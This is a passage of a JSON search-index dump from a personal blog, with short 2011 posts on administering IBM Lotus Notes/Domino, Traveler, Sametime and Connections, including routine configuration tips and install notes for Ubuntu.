target=\"_blank\"\u003ehttp://www.admincamp.de/AdminCampAnmeldung \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and when you tell them my\nname on the registration, you save 50€.\u003c/p\u003e\n\u003cp\u003eSee you in Gelsenkirchen?\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-09-07-admincamp2011/","title":"AdminCamp 2011"},{"body":"Wow great tipp! Read it a few years ago, but forgot it. Thanks Gab!\nhttp://www.turtleweb.com/turtleblog.nsf/dx/24082011172619GDAMAP.htm ","excerpt":"\u003cp\u003eWow great tipp! Read it a few years ago, but forgot it. Thanks Gab!\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.turtleweb.com/turtleblog.nsf/dx/24082011172619GDAMAP.htm\" target=\"_blank\"\u003ehttp://www.turtleweb.com/turtleblog.nsf/dx/24082011172619GDAMAP.htm \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-08-24-domino-console-on-the-mac/","title":"Domino Console on the Mac"},{"body":"Wow big news on Notes Design Blog. In my opinion not good for Notes and IBM, but my best wishes and good luck with the new job for Mary Beth.\nhttp://www.notesdesignblog.com/NotesDesignBlog/NDBlog.nsf/dx/so-long-and-thanks-for-all-the-yellow-stuff…..htm ","excerpt":"\u003cp\u003eWow  big news on Notes Design Blog. In my opinion not good for Notes and\nIBM, but my best wishes and good luck with the new job for Mary Beth.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.notesdesignblog.com/NotesDesignBlog/NDBlog.nsf/dx/so-long-and-thanks-for-all-the-yellow-stuff%e2%80%a6%e2%80%8b..htm\" target=\"_blank\"\u003ehttp://www.notesdesignblog.com/NotesDesignBlog/NDBlog.nsf/dx/so-long-and-thanks-for-all-the-yellow-stuff…..htm \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-08-23-mary-beth-raven-leaves-ibm/","title":"Mary Beth Raven leaves IBM"},{"body":"Martin Cygan postet an interested link today. It is a comparison of features of the different ActiveSync clients with different protocol versions.\nhttp://en.wikipedia.org/wiki/Comparison_of_Exchange_ActiveSync_Clients via Vergleich aller Microsoft Exchange ActiveSync Clients | Martin Cygan ","excerpt":"\u003cp\u003e\u003ca href=\"http://www.martin-cygan.de/microsoft-exchange/vergleich-aller-microsoft-exchange-activesync-clients/\" target=\"_blank\"\u003eMartin\nCygan \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n postet an interested link today. It is a comparison of features\nof the different ActiveSync clients with different protocol versions.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://en.wikipedia.org/wiki/Comparison_of_Exchange_ActiveSync_Clients\" target=\"_blank\"\u003ehttp://en.wikipedia.org/wiki/Comparison_of_Exchange_ActiveSync_Clients \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003evia\n\u003ca href=\"http://www.martin-cygan.de/microsoft-exchange/vergleich-aller-microsoft-exchange-activesync-clients/\" target=\"_blank\"\u003eVergleich\naller Microsoft Exchange ActiveSync Clients | Martin Cygan \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-07-20-comparison-of-microsoft-exchange-activesync-clients/","title":"Comparison of Microsoft Exchange ActiveSync Clients"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/hcl-notes-traveler/","title":"HCL Notes Traveler"},{"body":"See included fixes and downloads:\nNotes/Domino 8.5.2 Fix Pack 3 (now available for download from Fix Central) .\nUpdate: Found a forum post of a iNotes Problem after installing the fixpack: iNotes Formula error after upgrade 8.5.2 FP3 ","excerpt":"\u003cp\u003eSee included fixes and downloads:\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www-10.lotus.com/ldd/nflsblog.nsf/dx/852-Fix-Pack-3\" target=\"_blank\"\u003eNotes/Domino\n8.5.2 Fix Pack 3 (now available for download from Fix Central) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n .\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate: \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eFound a forum post of a iNotes Problem after installing the\nfixpack: \u003ca href=\"http://www-10.lotus.com/ldd/nd85forum.nsf/DateAllFlatWeb/132EBC8155FF7741852578D20025A9BB?OpenDocument\u0026amp;ca=drs-fo\" target=\"_blank\"\u003eiNotes\nFormula error after upgrade 8.5.2 FP3 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-07-19-ibm-developerworks-fixpack-3-for-notes-domino-8-5-2-is-available/","title":"IBM developerWorks : Fixpack 3 for Notes / Domino 8.5.2 is available"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/google-chrome/","title":"Google Chrome"},{"body":"Using LotusLive with Google Chrome\nvia Using LotusLive with Google Chrome dominoGuru.com .\nChris Toohey wrote a very interesting article on changing User Agent with Google Chrome. Needed this last week on an IBM Webcast, where LotusLive told me after login → you use an unsupported browser. :(\n","excerpt":"\u003cp\u003eUsing LotusLive with Google Chrome\u003c/p\u003e\n\u003cp\u003evia \u003ca href=\"http://www.dominoguru.com/pages/06242011022649.html\" target=\"_blank\"\u003eUsing LotusLive\nwith Google Chrome dominoGuru.com \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eChris Toohey wrote a very interesting article on changing User Agent\nwith Google Chrome. Needed this last week on an IBM Webcast, where\nLotusLive told me after login → you use an unsupported browser. :(\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-06-25-using-lotuslive-with-google-chrome-dominoguru-com/","title":"Using LotusLive with Google Chrome dominoGuru.com"},{"body":"Ted Hardenburgh gave a session on Paclug on Two Minutes Drills . I found some good hints in his slides and can recommend it for all Lotus Domino Administrators.\nYou can download some sample code like\nNew User Mail Agent\nOrphan Mail File Search template\nQuickr 8.2 Entry Generate XML All\nQuickr 8.2. Entry Generate XML Selected\non his blog in the download section .\n[via Lotus Nut ]\n","excerpt":"\u003cp\u003eTed Hardenburgh gave a session on \u003ca href=\"http://www.paclug.org/\" target=\"_blank\"\u003ePaclug \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n on\n\u003ca href=\"http://dominothoughts.com/DomThoughts/domthoughts.nsf/dx/PACLUG_TwoMinuteDrills.pdf/$file/PACLUG_TwoMinuteDrills.pdf\" target=\"_blank\"\u003eTwo Minutes Drills \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. I found some good hints in his slides and can\nrecommend it for all Lotus Domino Administrators.\u003c/p\u003e\n\u003cp\u003eYou can download some sample code like\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eNew User Mail Agent\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eOrphan Mail File Search template\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eQuickr 8.2 Entry Generate XML All\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eQuickr 8.2. Entry Generate XML Selected\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eon his \u003ca href=\"http://dominothoughts.com/\" target=\"_blank\"\u003eblog \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in the\n\u003ca href=\"http://dominothoughts.com/DomThoughts/DomThoughts.nsf/dx/paclug-downloads.htm\" target=\"_blank\"\u003edownload\nsection \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003e[\u003ca href=\"http://www.bleedyellow.com/blogs/lotusnut/entry/twominutedrills?lang=en_us\" target=\"_blank\"\u003evia\nLotus Nut \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n]\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-06-24-paclug-two-minutes-drills-slides/","title":"PacLug – Two Minutes Drills Slides"},{"body":"Mitch found out that FP2 for Notes 8.5.2 breaks Connections Files and Status Updater Plugins.\nhttp://www.curiousmitch.com/2011/05/notes-8-5-2-fp2-and-lotus-connections-plugins-might-not-play-nicely-together/ ","excerpt":"\u003cp\u003eMitch found out that FP2 for Notes 8.5.2 breaks Connections Files and\nStatus Updater Plugins.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.curiousmitch.com/2011/05/notes-8-5-2-fp2-and-lotus-connections-plugins-might-not-play-nicely-together/\" target=\"_blank\"\u003ehttp://www.curiousmitch.com/2011/05/notes-8-5-2-fp2-and-lotus-connections-plugins-might-not-play-nicely-together/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-05-12-notes-8-5-2-fp2-and-lotus-connections-plugins-might-not-play-nicely-together--curiousmitch/","title":"Notes 8.5.2 FP2 and Lotus Connections Plugins Might Not Play Nicely Together « CuriousMitch"},{"body":"I found some tips here i didn’t know. Perhaps some other admins can get some hints too.\nhttp://ntf.gbs.com/nathan/escape.nsf/d6plinks/NTFN-8GP6RP ","excerpt":"\u003cp\u003eI found some tips here i didn’t know. Perhaps some other admins can get\nsome hints too.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://ntf.gbs.com/nathan/escape.nsf/d6plinks/NTFN-8GP6RP\" target=\"_blank\"\u003ehttp://ntf.gbs.com/nathan/escape.nsf/d6plinks/NTFN-8GP6RP \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-05-10-escape-velocity-making-domino-designer-work-like-you-want/","title":"ESCAPE VELOCITY Making Domino Designer work like you want"},{"body":"Today i made a new assembly line in Tivoli Directory Integrator.\nI iterate Shortname and Filename (with path) of a jpeg-photo in a csv-file. A java class converts this pic to an jpeg binary (class returns this binary array) and then tdi write this value to domino ldap in jpegphoto attribute.\nWorks great, only the csv-file is a little bit of work, but it is a great way to add lots of pictures to sametime profiles.\nNext step is to include an connector to Lotus Connections profiles.\n","excerpt":"\u003cp\u003eToday i made a new assembly line in Tivoli Directory Integrator.\u003c/p\u003e\n\u003cp\u003eI iterate Shortname and Filename (with path) of a jpeg-photo in a\ncsv-file. A java class converts this pic to an jpeg binary (class\nreturns this binary array) and then tdi write this value to domino ldap\nin jpegphoto attribute.\u003c/p\u003e\n\u003cp\u003eWorks great, only the csv-file is a little bit of work, but it is a\ngreat way to add lots of pictures to sametime profiles.\u003c/p\u003e\n\u003cp\u003eNext step is to include an connector to Lotus Connections profiles.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-04-29-populate-profile-pictures-with-tdi-to-ldap/","title":"Populate profile pictures with TDI to LDAP"},{"body":"To automate the sync_all_dns.bat on my IBM Lotus Connections Servers, i made a scheduled task for the Tivoli Directory Integrator (TDI) script. This works fine on Windows 2003.\nToday i discovered that my scheduled task on Windows 2008 wasn’t running since i switched the operating system to Microsoft Windows 2008.\nAfter a search i found that i need to set a optional parameter, then it works:\nTo start bat- or cmd-files, you have to insert the path to this script in “Start in (Optional)”. When i start the script without “Start in” the scheduler gives a “SUCCESS” Status, but nothing happens!\nYou can test with schtasks /run /tn \u0026quot;taskname\u0026quot; and have a look on [tdisolutionpath]/logs/ibmdi.log.\n","excerpt":"\u003cp\u003eTo automate the sync_all_dns.bat on my IBM Lotus Connections Servers, i\nmade a scheduled task for the Tivoli Directory Integrator (TDI) script.\nThis works fine on Windows 2003.\u003c/p\u003e\n\u003cp\u003eToday i discovered that my scheduled task on Windows 2008 wasn’t running\nsince i switched the operating system to Microsoft Windows 2008.\u003c/p\u003e\n\u003cp\u003eAfter a search i found that i need to set a optional parameter, then it\nworks:\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2011/04/2011-04-18_10-14-37.png\" alt=\"2011 04 18 10 14 37\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eTo start bat- or cmd-files, you have to insert the path to this script\nin “Start in (Optional)”. When i start the script without “Start in” the\nscheduler gives a “SUCCESS” Status, but nothing happens!\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-04-18-running-sync_all_dns-as-scheduled-task-on-windows-2008/","title":"Running Sync\\_All\\_DNS as scheduled task on Windows 2008"},{"body":"Today i had problems to recreate my Activities Sidebar connection after a Notes Client reinstall.\nEach time when i want to connect, i got the following error message:\nCannot connect to the Activities Server.\nEither the URL is incorrect, the server is down, or a firewall may be preventing you from reaching the server. Check the URL, your firewall settings and the server status and try again.”\nWhen i use the credentials in my browser or the integrated Notes browser, i could login, so server is responding and credentials were ok.\nThen i had a look in my Domino person record and found out, that the shortname i used is not the first one which is configured. So i used the first shortname for activities sidebar and …\nIT WORKS!!!\nResumé: The first shortname in your person record is very important for Lotus IBM Connections. I had several issues when sorting changes in the shortname field, so leave the sorting (because TDI use this for mapping to profiles database) and use the first shortname for the activities sidebar in Lotus Notes.\n","excerpt":"\u003cp\u003eToday i had problems to recreate my Activities Sidebar connection after\na Notes Client reinstall.\u003c/p\u003e\n\u003cp\u003eEach time when i want to connect, i got the following error message:\u003c/p\u003e\n\u003cp\u003eCannot connect to the Activities Server.\u003c/p\u003e\n\u003cp\u003eEither the URL is incorrect, the server is down, or a firewall may be\npreventing you from reaching the server. Check the URL, your firewall\nsettings and the server status and try again.”\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2011/04/2011-04-11_10-58-19.png\" alt=\"Error message when testing connection to IBM Connections Activities\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eWhen i use the credentials in my browser or the integrated Notes\nbrowser, i could login, so server is responding and credentials were ok.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-04-11-weird-problem-with-lotus-connections-activities-integration-in-notes-client/","title":"Weird problem with Lotus Connections Activities Integration in Notes Client"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/firefox/","title":"Firefox"},{"body":"There is a new interim Fix for Lotus Domino 8.5.2 FP2 to get Firefox 4 working with iNotes.\nFirefox 4 support availability for Lotus iNotes – By Ulrich Krause – eknori.de .\n","excerpt":"\u003cp\u003eThere is a new interim Fix for Lotus Domino 8.5.2 FP2 to get Firefox 4\nworking with iNotes.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.eknori.de/2011-04-05/firefox-4-support-availability-for-lotus-inotes/\" target=\"_blank\"\u003eFirefox\n4 support availability for Lotus iNotes – By Ulrich Krause – eknori.de \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-04-06-firefox-4-support-availability-for-lotus-inotes-by-ulrich-krause-eknori-de/","title":"Firefox 4 support availability for Lotus iNotes – By Ulrich Krause – eknori.de"},{"body":"Here it is! IBM Connections 3.0.1 announced today! .\nvia Synch.rono.us Electronic Availability on 7th of april.\nUpdate – Youtube Video showing the new features ","excerpt":"\u003cp\u003e\u003ca href=\"http://synch.rono.us/social/blog.nsf/dx/301.htm\" target=\"_blank\"\u003eHere it is! IBM\nConnections 3.0.1 announced today! \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003evia \u003ca href=\"http://synch.rono.us\" target=\"_blank\"\u003eSynch.rono.us \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003eElectronic Availability on 7th of april.\u003c/p\u003e\n\u003ch1 id=\"update--youtube-video-showing-the-new-features\"\u003eUpdate – Youtube Video showing the new features \u003ca href=\"#update--youtube-video-showing-the-new-features\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e","ref":"https://stoeps.de/posts/2011/2011-04-05-here-it-is-ibm-connections-3-0-1-announced-today/","title":"Here it is! IBM Connections 3.0.1 announced today – Update"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/designer/","title":"Designer"},{"body":"Nathan T Freeman published a new release and project on OpenNTF.org .\nThe project offers Git support for IBM Lotus Domino Designer! Thanks a lot.\nIt would be great, when we could use it too for Lotus Administrator to get track of configuration changes in different databases like the Domino Directory.\nESCAPE VELOCITY :: New OpenNTF.org project .\n","excerpt":"\u003cp\u003eNathan T Freeman published a new release and project on\n\u003ca href=\"http://www.openntf.org\" target=\"_blank\"\u003eOpenNTF.org \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e\n\u003cp\u003eThe\n\u003ca href=\"http://www.openntf.org/internal/home.nsf/project.xsp?action=openDocument\u0026amp;name=EGit%20for%20IBM%20Domino%20Designer\" target=\"_blank\"\u003eproject \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\noffers \u003ca href=\"http://git-scm.com/\" target=\"_blank\"\u003eGit \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n support for IBM Lotus Domino Designer!\nThanks a lot.\u003c/p\u003e\n\u003cp\u003eIt would be great, when we could use it too for Lotus Administrator to\nget track of configuration changes in different databases like the\nDomino Directory.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://ntf.gbs.com/nathan/escape.nsf/d6plinks/NTFN-8FFSD4\" target=\"_blank\"\u003eESCAPE\nVELOCITY :: New OpenNTF.org project \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-04-03-escape-velocity-new-openntf-org-project-git-for-lotus-domino-designer/","title":"ESCAPE VELOCITY New OpenNTF.org project – Git for Lotus Domino Designer"},{"body":"With last update vor Lotus Traveler 8.5.2.2 there came a new feature for Android devices. You can read and send encrypted mails and you can sign mails with your notes id.\nYou can click on details in new mails, there you find the new checkboxes for encrypt or sign.\nLong needed feature and it works better than Lotus Companion App on iPhone, because the id password is cached for a short time.\nUpdate After some testing i wrote down some points on this new feature.\nFirst of all i asked me, why i didn’t read anything about it. I found no document on IBM, which announces encryption on Android before 8.5.3. On my search i found a post in the Domino 8.5 Forum , which describes the new feature too. So why did nobody blog or announce it?\nI have a test machine which is installed like described in the Traveler documention. I used a second Domain and Organization, so i can make more frequent updates and do not disturb our production environment.\nBut:\nI can’t use the new policies, because they aren’t in my production directory.\nI can’t use ID Vault for encryption in Lotus Traveler, because the Traveler server isn’t allowed to download the ids. I found no way to get this working and no speaking log messages.\nI think somebody should add these points to the official documentation.\nIn the moment i have no idea, how long the password is cached! My unencrypted messages stay unecrypted.\nBut i’m very impressed on the new feature, because the traveler implementation is only a few months old, but the functionality is better now than on the iPhone.\n","excerpt":"\u003cp\u003eWith last update vor Lotus Traveler 8.5.2.2 there came a new feature for\nAndroid devices. You can read and send encrypted mails and you can sign\nmails with your notes id.\u003c/p\u003e\n\u003cp\u003eYou can click on details in new mails, there you find the new checkboxes\nfor encrypt or sign.\u003c/p\u003e\n\u003cp\u003eLong needed feature and it works better than Lotus Companion App on\niPhone, because the id password is cached for a short time.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2011/03/2011-03-17_2138.png\" alt=\"2011 03 17 2138\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003ch1 id=\"update\"\u003eUpdate \u003ca href=\"#update\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eAfter some testing i wrote down some points on this new feature.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eFirst of all i asked me, why i didn’t read anything about it. I found\nno document on IBM, which announces encryption on Android before 8.5.3.\nOn my search i found a\n\u003ca href=\"http://www-10.lotus.com/ldd/nd85forum.nsf/DateAllFlatWeb/a5b17aa4b1ea4a998525785500558f8f?OpenDocument\" target=\"_blank\"\u003epost\nin the Domino 8.5 Forum \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n, which describes the new feature too. So why\ndid nobody blog or announce it?\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-03-17-lotus-traveler-8-5-2-2-implements-mail-encryption-for-android-devices/","title":"Lotus Traveler 8.5.2.2 implements mail encryption for Android devices"},{"body":"Installed it on android. Functions are ok, but i found no way to hide offline contacts.\nAfter all it is the first sametime client in the marketplace and gives me the possibility to chat with my colleagues.\nhttp://schmhen.wordpress.com/2011/03/14/sametime-client-for-iphone-and-android-available/ ","excerpt":"\u003cp\u003eInstalled it on android. Functions are ok, but i found no way to hide\noffline contacts.\u003c/p\u003e\n\u003cp\u003eAfter all it is the first sametime client in the marketplace and gives\nme the possibility to chat with my colleagues.\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://schmhen.wordpress.com/2011/03/14/sametime-client-for-iphone-and-android-available/\" target=\"_blank\"\u003ehttp://schmhen.wordpress.com/2011/03/14/sametime-client-for-iphone-and-android-available/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-03-15-schmhens-blog-sametime-client-for-android-and-iphone/","title":"schmhen’s Blog: Sametime Client for Android and iPhone"},{"body":"New feature in 8.5.2 is synchronizing of sent as an imap folder. Article describes the way to deploy and give some hints.\nNotes.ini setting to enable: EnableImapFolderSynch=1\nhttp://www.dominopower.com/newsitems/00052856.html ","excerpt":"\u003cp\u003eNew feature in 8.5.2 is synchronizing of sent as an imap folder. Article\ndescribes the way to deploy and give some hints.\u003c/p\u003e\n\u003cp\u003eNotes.ini setting to enable: EnableImapFolderSynch=1\u003c/p\u003e\n\u003cp\u003e\u003ca href=\"http://www.dominopower.com/newsitems/00052856.html\" target=\"_blank\"\u003ehttp://www.dominopower.com/newsitems/00052856.html \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-03-15-new-article-imap-folders-synching-with-notes-views-in-domino-8-5-2/","title":"New article: IMAP folders synching with Notes views in Domino 8.5.2"},{"body":"Because i had several issues with automated renewed ssl and ltpa keys on my websphere servers, i found this article on the blog of Mitch Cohen : http://www.curiousmitch.com/2009/06/disabling-automatic-ltpa-key-generation-in-was-or-how-to-stopsso-between-was-and-domino-from-breaking/ Perhaps this is interesting for more people.\n","excerpt":"\u003cp\u003eBecause i had several issues with automated renewed ssl and ltpa keys on\nmy websphere servers, i found this article on the blog of\n\u003ca href=\"http://www.curiousmitch.com\" target=\"_blank\"\u003eMitch Cohen \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n:\n\u003ca href=\"http://www.curiousmitch.com/2009/06/disabling-automatic-ltpa-key-generation-in-was-or-how-to-stopsso-between-was-and-domino-from-breaking/\" target=\"_blank\"\u003ehttp://www.curiousmitch.com/2009/06/disabling-automatic-ltpa-key-generation-in-was-or-how-to-stopsso-between-was-and-domino-from-breaking/ \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e\n\u003cp\u003ePerhaps this is interesting for more people.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-03-03-websphere-application-server-automatic-key-rollover/","title":"Websphere Application Server – Automatic Key Rollover"},{"body":"You can use policy setting document “Mail settings” to deploy a standard message disclaimer for your users.\nFirst you have to configure your domino server which makes the smtp conversion of internet mails. For this server open the “configuration document” and check if “Message disclaimers” is enabled.\nNow we need a policy for all traveler users, or if you want to deploy personalized signatures, for each traveler user.\nI created a dynamic policy (explicit policy document and set of group/user in “policy assignment”) for my traveler user and made a mail setting document for the disclaimer:\n“Notes client can add disclaimer” to disabled: So the server will append/prepend the disclaimer text. This is important, because the traveler client don’t act as a notes client, so it is the only way to deploy a disclaimer text with domino tools on traveler.\nAppend will set your disclaimer text to top of your mail, and prepend on the bottom.\nMail and Traveler settings are applied to mail files on the server by the Administration Process every 12 hours by default. Adminp can be triggered on the server console: “tell adminp process mailpolicy” or “tell adminp process traveler”.\nOr you change the notes.ini value ADMINP_POLL_INTERVALL=(time in minutes), that adminp process these settings more often.\n","excerpt":"\u003cp\u003eYou can use policy setting document “Mail settings” to deploy a standard\nmessage disclaimer for your users.\u003c/p\u003e\n\u003cp\u003eFirst you have to configure your domino server which makes the smtp\nconversion of internet mails. For this server open the “configuration\ndocument” and check if “Message disclaimers” is enabled.\u003c/p\u003e\n\u003cp\u003e\u003cp class=\"md__image\"\u003e\n \u003cimg src=\"/images/2011/02/2011-02-28_12281.png\" alt=\"2011 02 28 12281\" /\u003e\n\u003c/p\u003e\n\n\u003c/p\u003e\n\u003cp\u003eNow we need a policy for all traveler users, or if you want to deploy\npersonalized signatures, for each traveler user.\u003c/p\u003e\n\u003cp\u003eI created a dynamic policy (explicit policy document and set of\ngroup/user in “policy assignment”) for my traveler user and made a mail\nsetting document for the disclaimer:\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-02-28-manage-message-signatures-with-lotus-notes-traveler/","title":"Manage message signatures with Lotus Notes Traveler"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/policy/","title":"Policy"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/traveler/","title":"Traveler"},{"body":"Finally i managed to install Connections 3 on Ubuntu Server, but i didn’t got a one machine setup running.\nMy idea was a demo install for testing issues. I can’t find DB2 32-Bit for Linux, so i decided to use Ubuntu 64 Bit and all other components 64 Bit. I got error after enabling ssl on IHS, because the ssl Plugin wasn’t found.\nI think that the .so file is 32 bit and can’t work with 64 bit Linux.\nSo i make a two machine setup. One 64 bit ubuntu vm with db2 9.7 and tdi 7 64 bit\nOther machine is 32 bit and host Websphere Application Server, IHS and Connections\nAnd again. To be continued …\n","excerpt":"\u003cp\u003eFinally i managed to install Connections 3 on Ubuntu Server, but i\ndidn’t got a one machine setup running.\u003c/p\u003e\n\u003cp\u003eMy idea was a demo install for testing issues. I can’t find DB2 32-Bit\nfor Linux, so i decided to use Ubuntu 64 Bit and all other components 64\nBit. I got error after enabling ssl on IHS, because the ssl Plugin\nwasn’t found.\u003cbr\u003e\nI think that the .so file is 32 bit and can’t work with 64 bit Linux.\u003c/p\u003e\n\u003ch1 id=\"so-i-make-a-two-machine-setup\"\u003eSo i make a two machine setup. \u003ca href=\"#so-i-make-a-two-machine-setup\"\u003e\u003ci class=\"las la-link la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\u003c/h1\u003e\n\n\u003cp\u003eOne 64 bit ubuntu vm with db2 9.7 and tdi 7 64 bit\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-01-30-connections-3-on-ubuntu-some-news/","title":"Connections 3 on Ubuntu some news"},{"body":"Only some short news. I disabled comments after 28 days of article creation time. Secondly i installed a new contact form mailer, so you can send me additional infos to posts after this time with this form.\n","excerpt":"\u003cp\u003eOnly some short news. I disabled comments after 28 days of article\ncreation time. Secondly i installed a new contact form mailer, so you\ncan send me additional infos to posts after this time with this form.\u003c/p\u003e","ref":"https://stoeps.de/posts/2011/2011-01-23-contact-and-comments/","title":"Contact and comments"},{"body":"http://www.edbrill.com/ebrill/edbrill.nsf/dx/now-available-lotus-notes-traveler-for-android ","excerpt":"\u003cp\u003e\u003ca href=\"http://www.edbrill.com/ebrill/edbrill.nsf/dx/now-available-lotus-notes-traveler-for-android\" target=\"_blank\"\u003ehttp://www.edbrill.com/ebrill/edbrill.nsf/dx/now-available-lotus-notes-traveler-for-android \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\u003c/p\u003e","ref":"https://stoeps.de/posts/2010/2010-12-14-traveler-for-android-available/","title":"Traveler for Android available"},{"body":"Many people know, that i prefer Ubuntu for my testing environments and several production servers. So one of my first tries to install Lotus Connections 3.0 was on Ubuntu 10.04 LTS .\nBest thing in Ubuntu is the package management with aptitude or apt (First developed from Debian GNU/Linux Community ). It is easy to use and powerful in installation and upgrade processes.\nUbuntu 10.04 LTS Server Installation Installed Standard Server 64 Bit with OpenSSH , nothing else. After the first start i prepared network, dns and /etc/hosts.\nFirst hint: Ubuntu normaly includes a line in the /etc/hosts with 127.0.1.1 hostname. I got an error on the first Websphere Application Server start, so i changed this line to the ip address of my host and the hostname.\nAdditional packages I didn’t install a complete x-server environment. It works great with OpenSSH Server and xauth.\napt-get install xauth xterm ia32-libs vim-nox libaio1 libstdc++5 xauth, xterm: Minimal X-Server Environment\nia32-libs: Libraries for 32 Bit\nlibaio1: not shure if you need it, but i think so\nUpdate: libaio1 is needed from DB2 Installer\nlibstdc++5: Installation of Tivoli Directory 